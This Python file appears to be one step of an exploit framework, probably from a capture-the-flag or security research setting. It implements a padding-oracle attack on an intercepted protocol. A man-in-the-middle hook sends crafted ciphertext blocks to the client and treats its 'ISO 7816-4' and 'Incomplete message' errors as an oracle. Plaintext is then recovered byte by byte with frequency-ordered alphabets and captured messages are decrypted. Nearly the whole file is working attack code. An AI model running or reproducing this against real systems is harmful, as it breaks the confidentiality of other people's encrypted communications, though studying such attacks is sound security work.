from core.core30_context.context_dependency_graph import context_dependencies
from core.core30_context.context import Context

from step1_model import UnitCryptoMessageModel, UnitErrorMessageModel, decryption_success
from step1_exploit import xor

from typing import Dict
import string
import time


alphabetbase = bytes(range(10)) + \
   bytes([0x80]) + \
   string.ascii_lowercase.encode() + \
   b'"{},:=_ ' + \
   string.ascii_uppercase.encode() + \
   string.digits.encode()

for i in range(256):
    if bytes([i]) not in alphabetbase:
        alphabetbase += bytes([i])


alphabet = b'eythaiu worlnscpdgfm.,\":ASTICWNYP{}'
for i in string.ascii_lowercase.encode():
    if bytes([i]) not in alphabet:
        alphabet += bytes([i])
for i in string.digits.encode():
    if bytes([i]) not in alphabet:
        alphabet += bytes([i])
for i in string.ascii_uppercase.encode():
    if bytes([i]) not in alphabet:
        alphabet += bytes([i])
for i in string.punctuation.encode():
    if bytes([i]) not in alphabet:
        alphabet += bytes([i])

for i in alphabetbase:
    if i not in alphabet:
        alphabet += bytes([i])

alphabet_if_digit = string.digits.encode() + b" \":,+="
alphabet_if_special = b"\", :{}"
alphabet_for_null = b'\x00\x80'
for i in string.punctuation.encode():
    if bytes([i]) not in alphabet_if_special:
        alphabet_if_special += bytes([i])

for i in alphabet:
    if i not in alphabet_if_digit:
        alphabet_if_digit += bytes([i])
    if i not in alphabet_if_special:
        alphabet_if_special += bytes([i])
    if i not in alphabet_for_null:
        alphabet_for_null += bytes([i])

assert(len(alphabet) == 256)
assert(len(alphabet_if_digit) == 256)
assert(len(alphabet_if_special) == 256)
assert(len(set(alphabet)) == 256)
assert(len(set(alphabet_if_digit)) == 256)
assert(len(set(alphabet_if_special)) == 256)


class ClientPaddingOracle:

    def __init__(self):
        self.asked = {}
        self.new_asked = []

    def decrypt_data(self, input_data):
        curidx = 0
        curmsg = b''
        while True:
            letter = alphabet[curidx]
            if curmsg:
                if curmsg[0:1] in alphabet_if_digit[:10]:
                    letter = alphabet_if_digit[curidx]
                if curmsg[0:1] in alphabet_if_special[:20] and curmsg[0:1] != b'"':
                    letter = alphabet_if_special[curidx]
                if curmsg[0] == 0:
                    letter = alphabet_for_null[curidx]
            else:
                letter = alphabet_for_null[curidx]

            print(f"CUR IDX: {curidx} letter: {bytes([letter]).hex()} CUR MSG: {curmsg.hex()}")
            print(curmsg)

            curpos = len(curmsg)
            window = input_data
            curpos = curpos % 16
            to_give_back = window[:-17 - curpos] + \
                           bytes([window[-17 - curpos] ^ letter ^ 0x80]) + \
                           xor(window[-16 - curpos: -16], curmsg[:curpos]) + \
                           window[-16:]

            # ugly but managing asyncio was evil, TODO: refactor with asyncio
            self.asked[to_give_back] = False
            self.new_asked.append(to_give_back)
            start = time.time()
            while not self.asked[to_give_back]:
                time.sleep(0.05)
                if time.time() > start + 3:
                    self.new_asked.append(to_give_back)
                    start = time.time()
            recv = self.asked[to_give_back]

            if b'ISO 7816-4' not in recv and b'Incomplete message' not in recv:
                print(f"FOUND CHAR =): {chr(letter)}")
                curmsg = bytes([letter]) + curmsg
                curidx = 0
            else:
                curidx += 1
                if curidx >= 0x100:
                    curidx = 0

            if len(curmsg) == 0x10:
                return curmsg

    def get_last_pending_request(self):
        try:
            return self.new_asked.pop()
        except:
            return b''

    def solve(self, key, data):
        if data is not None:
            self.asked[key] = data
        else:
            self.new_asked.append(key)


oracle_manager = ClientPaddingOracle()

async def on_recv(full_context, data, serverside_writer, serverside_reader, clientside_writer, clientside_reader):
    # receive_message(data, True, full_context)
    # serverside_writer.write(data)
    # await serverside_writer.drain()
    next_decrypt_test = oracle_manager.get_last_pending_request()
    try:
        clientside_writer.write(b'\x01iviviviviviviviv'+next_decrypt_test)
        await clientside_writer.drain()
        client_oracle = await clientside_reader.read(1024)
    except:
        client_oracle = None
    oracle_manager.solve(next_decrypt_test, client_oracle)
    return data


@context_dependencies(('.exploit.step1.decrypted_matches', Dict[str, str]))
def decrypt_and_act(ctxt: Context, msg_index, data, block_to_take):
    prev = data[block_to_take * 0x10: (block_to_take + 1) * 0x10]
    block = data[(block_to_take + 1) * 0x10: (block_to_take + 2) * 0x10]
    all_decrypted_blocks = ctxt['exploit']['step1']['decrypted_matches']

    if block.hex() in all_decrypted_blocks:
        out = bytes.fromhex(all_decrypted_blocks[block.hex()])
    else:
        out = oracle_manager.decrypt_data(prev + block)
        decryption_success(msg_index, block_to_take, out)
    print(block.hex(), out.hex())
    return out


def deal_with(msg_index, msg, known):
    match msg:
        case UnitCryptoMessageModel():
            data = bytes.fromhex(msg.enc_bytes)[1:]
            out = decrypt_and_act(msg_index, data, 0)

            msg_type = out[8]
            if msg_type not in known:
                known.add(msg_type)
                print(f"{msg_type} not known, will do all msg")
                for block_idx in range(1, (len(data) // 0x10) - 1):
                    decrypt_and_act(msg_index, data, block_idx)
        case UnitErrorMessageModel():
            print("Error message so no analysis")
        case _:
            raise NotImplementedError
